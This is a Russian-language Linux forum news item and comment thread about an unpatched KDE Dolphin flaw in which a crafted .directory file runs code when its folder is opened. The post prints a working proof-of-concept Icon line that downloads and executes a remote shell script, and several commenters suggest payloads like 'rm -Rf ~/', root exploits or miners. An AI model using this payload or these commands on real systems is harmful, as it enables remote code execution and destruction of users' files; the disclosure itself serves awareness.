LINUX.ORG.RU

Незакрытая уязвимость в KDE

 , , ,


1

2

Исследователь Dominik Penner опубликовал незакрытую уязвимость в KDE (Dolphin, KDesktop). Если пользователь откроет директорию, где содержится специально сконструированный файл чрезвычайно простой структуры, код из этого файла будет выполнен от имени пользователя. Тип файла определяется автоматически, поэтому основное содержание и размер файла может быть любым. Однако требуется, чтобы пользователь самостоятельно открыл директорию файла. Причиной уязвимости называется недостаточное следование спецификации FreeDesktop разработчиками KDE.

>>> Подробности

Речь о файлах .desktop и .directory. Пример:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)


РЕШЕТО!

alexferman ★★☆ ()
Ответ на: комментарий от Lokidrow

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

jtad ()
Ответ на: комментарий от alexferman

Феерично. «О сколько нам бэкдоров чудных готовит Интернета век!»

Deleted ()
Ответ на: комментарий от jtad

а в винде тоже была уязвимость, когда иконки исполнялись. BUG-TO-BUG compatibility!

anonymous ()

Удалил кеды. Спасибо.

anonymous ()

Уииии летс кедосрач бегин!

anonymous ()

Жесть. Давно такого позора не было.

CYB3R ★★★★★ ()
Ответ на: комментарий от anonymous

А будет ли? Вполне возможно, что слоган «нас мало, но мы в кедах» пора менять на «нас очень мало, и мы скоро не в кедах».

Deleted ()

Чем жирнее софт, тем больше вероятность ошибки, очевидно. Не сто́ит жертвовать безопасностью ради удобства.

anonymous ()

Когда там последнюю уязвимость в GNOME нашли? В 10 году?

eyjafjallajokull ()

Когда я говорил, что Dolphin, вечно засирающий каталоги файлом .directory, когда-нибудь этим поплатится, все смеялись и не верили.

Вообще эту дрянь с .directory-файлами нужно переписать и сделать по уму, как в Nautilus, где имеется нормальная база данных для параметров директорий. Странно, что KDE-шники до сих пор это не сделали и идут путём Windows (засрём всё Thumbs.db) или macOS (ну здравствуй, .DS_Store).

EXL ★★★★★ ()
Ответ на: комментарий от EXL

Справедливости ради, надо сказать, что вантуз можно отучить плодить тумбочки. Про макОСь не помню, вроде тоже на то твикеры были.

dv76 ★★★ ()
Ответ на: комментарий от EXL

Вообще, надо пользоваться нормальными ФМ, вроде mc или PCManFM, которые не плодят всякую хрень, которая потом мешает юзеру, заставляя его лихорадочно вспоминать, какие настройки у той или иной директории.

peregrine ★★★★★ ()
Ответ на: комментарий от peregrine

Пользуюсь Dolphin, directory-файлов нигде нет, а этими убогими огрызками сам пользуйся

alexferman ★★☆ ()

Виндовые баги середины 2000-х теперь и в линупсе.

kirk_johnson ★☆ ()
Ответ на: комментарий от EXL

где имеется нормальная база данных для параметров директорий

при подключении к другому пк настройки для каталога не будут видны.

LinuxDebian ★★★★ ()

Пользуюсь krusader, directory-файлов нет.

anonymous ()
Ответ на: комментарий от anonymous

Да? Иконку на каталог поставь... Там тоже это работает. И теоретически можно тебе флешку дать с «rm -rf ~/*»

LinuxDebian ★★★★ ()
Последнее исправление: LinuxDebian (всего исправлений: 1)
Ответ на: комментарий от eyjafjallajokull

Зачем искать уязвимость в том, чем никто не пользуется ;)

LinuxDebian ★★★★ ()
Ответ на: комментарий от LinuxDebian

Ожидаемый коммент. GNOME - стандарт. Только это не отменяет того факта что он решето.

eyjafjallajokull ()

Вспомнил баян про белорусский вирус и пошел паниковать.

anonymous ()
Ответ на: комментарий от jtad

Разве, это вроде гном стремится быть максимально простым. Кеды можно настроить как угодно.

Dieter ★★★ ()
Ответ на: комментарий от Lokidrow

*Ушёл удалять кеды*

Я надеюсь пошел прямо с гитхаба удалять?

anonymous ()

Dolphin, это дельфин или такой FM? Лежит на полочке в меню и никого не трогает.

anonymous ()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

Как будто что-то плохое

tiinn ★★★ ()
Ответ на: комментарий от tiinn

Еще одна винда не нужна. Уже есть единственная-неповторимая - наслаждайся.

Deleted ()
Ответ на: комментарий от alexferman

Пользуюсь Dolphin, directory-файлов нигде нет, а этими убогими огрызками сам пользуйся

Есть же божественный krusader

tiinn ★★★ ()
Ответ на: комментарий от Deleted

Еще одна винда не нужна. Уже есть единственная-неповторимая - наслаждайся.

Единственная-неповторимая осталась в 2000 году. Всё остальное приходится допиливать напильником, чтобы хоть немного походило на Win2K. Дисяточку, кстати, уже невозможно так допилить, увы.

tiinn ★★★ ()
Ответ на: комментарий от jtad

Кде ставят в основном виндузятники, которые любят чтобы линух был похож на винду

До определённого момента Гном был был предпочтительнее экспиподобного КДЕ. Потом всё превратилось в Яблоко. Причём обгрызанное со всех сторон. Не надо валить на потребляющих Винду свои косяки :)

anonymous ()

А если пользователь не под рутом?

Vinni_Pooh ★★★★★ ()
Ответ на: комментарий от LinuxDebian

при подключении к другому пк настройки для каталога не будут видны.

  1. Как будто этим дерьмом вообще кто-то пользуется, оно обычно только в ступор вводит.
  2. Иконки всё равно слетят, если они лежат «где-то там» на локальном компе.
EXL ★★★★★ ()
Ответ на: комментарий от Vinni_Pooh

То можно покоцать хомяк. С точки зрения системы - ерунда, а с точки зрения юзера - лучше бы система пропала, а хомяк остался :)

anonymous ()
Ответ на: комментарий от Vinni_Pooh

А если пользователь не под рутом?

И как это спасёт тебя, если я засуну туда rm -Rf ~/ ?

EXL ★★★★★ ()
Ответ на: комментарий от anonymous

То можно покоцать хомяк

Более того, если у жертвы какое-нибудь старое ядро, для которого есть готовый эксплоит, можно легко запустить его и получить root.

EXL ★★★★★ ()
Ответ на: комментарий от EXL

Да не нужен рут на десктопе. Удалить домашний каталог и запустить майнер можно под обычным пользователем.

anonymous ()
Ответ на: комментарий от alexferman

а другие DE, использующие эти .desktop файлы, таким не грешат?

bvn13 ★★★★★ ()
Ответ на: комментарий от EXL

по уму, как в Nautilus, где имеется нормальная база данных для параметров директорий

Говно тормозное, только ресурсы жрёт напрасно.

anonymous ()

теперь готово для десктопа

пойду напишу KDE .desktop Remover Enterprise (с поддержкой интеграции Oracle Database)

buratino ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.